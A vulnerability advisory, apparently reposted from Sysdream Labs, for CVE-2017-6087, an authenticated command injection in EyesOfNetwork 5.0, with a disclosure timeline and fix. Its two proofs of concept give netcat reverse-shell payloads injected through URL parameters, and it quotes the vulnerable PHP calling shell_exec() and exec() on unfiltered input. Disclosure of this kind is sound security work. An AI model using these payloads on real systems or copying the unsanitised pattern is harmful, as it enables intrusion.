扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 |
# [CVE-2017-6087] EON 5.0 Remote Code Execution ## Description EyesOfNetwork ("EON") is an OpenSource network monitoring solution. ## Remote Code Execution (authenticated) The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code. **CVE ID**: CVE-2017-6087 **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-78 **CVSS Base Score**: 7.6 **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L ### Proof of Concept 1 On the attacker's host, we start a handler: </code><code> nc -lvp 1337 </code><code> The <code>selected_events</code> parameter is not correctly filtered before it is used by the <code>shell_exec()</code> function. There, it is possible to inject a payload like in the request below, where we connect back to our handler: </code><code> https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash; </code><code> #### Vulnerable code The payload gets injected into the <code>$event[$key]</code> and <code>$ged_command variables of the <code>module/monitoring_ged/ged_functions.php</code> file, line 373: </code><code> $ged_command = "-update -type $ged_type_nbr "; foreach ($array_ged_packets as $key => $value) { if($value["type"] == true){ if($key == "owner"){ $event[$key] = $owner; } $ged_command .= "\"".$event[$key]."\" "; } } $ged_command = trim($ged_command, " "); shell_exec($path_ged_bin." ".$ged_command); </code><code> Two other functions in this file are also affected by this problem: * <code>delete($selected_events, $queue); * <code>ownDisown($selected_events, $queue, $global_action); ### Proof of Concept 2 On the attacker's host, we start a handler: </code><code> nc -lvp 1337 </code><code> The <code>module</code> parameter is not correctly filtered before it is used by the <code>shell_exec()</code> function. Again, we inject our connecting back payload: </code><code> https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding </code><code> #### Vulnerable code In the <code>module/index.php</code> file, line 24, we can see that our payload is injected into the <code>exec()</code> function without any sanitization: </code><code> # Check optionnal module to load if(isset($_GET["module"]) && isset($_GET["link"])) { $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l"); # Redirect to module page if rpm installed if($module!=0) { header('Location: '.$_GET["link"].''); } } </code><code> ## Timeline (dd/mm/yyyy) * 01/10/2016 : Initial discovery. * 09/10/2016 : Fisrt contact with vendor. * 23/10/2016 : Technical details sent to the security contact. * 27/10/2016 : Vendor akwnoledgement and first patching attempt. * 11/10/2016 : Testing the patch revealed that it needed more work. * 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. * 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement. * 14/03/2017 : Public disclosure. Thank you to EON for the fast response. ## Solution Update to version 5.1 ## Affected versions * Version <= 5.0 ## Credits * Nicolas SERRA <n.serra@sysdream.com> -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream |
体验盒子
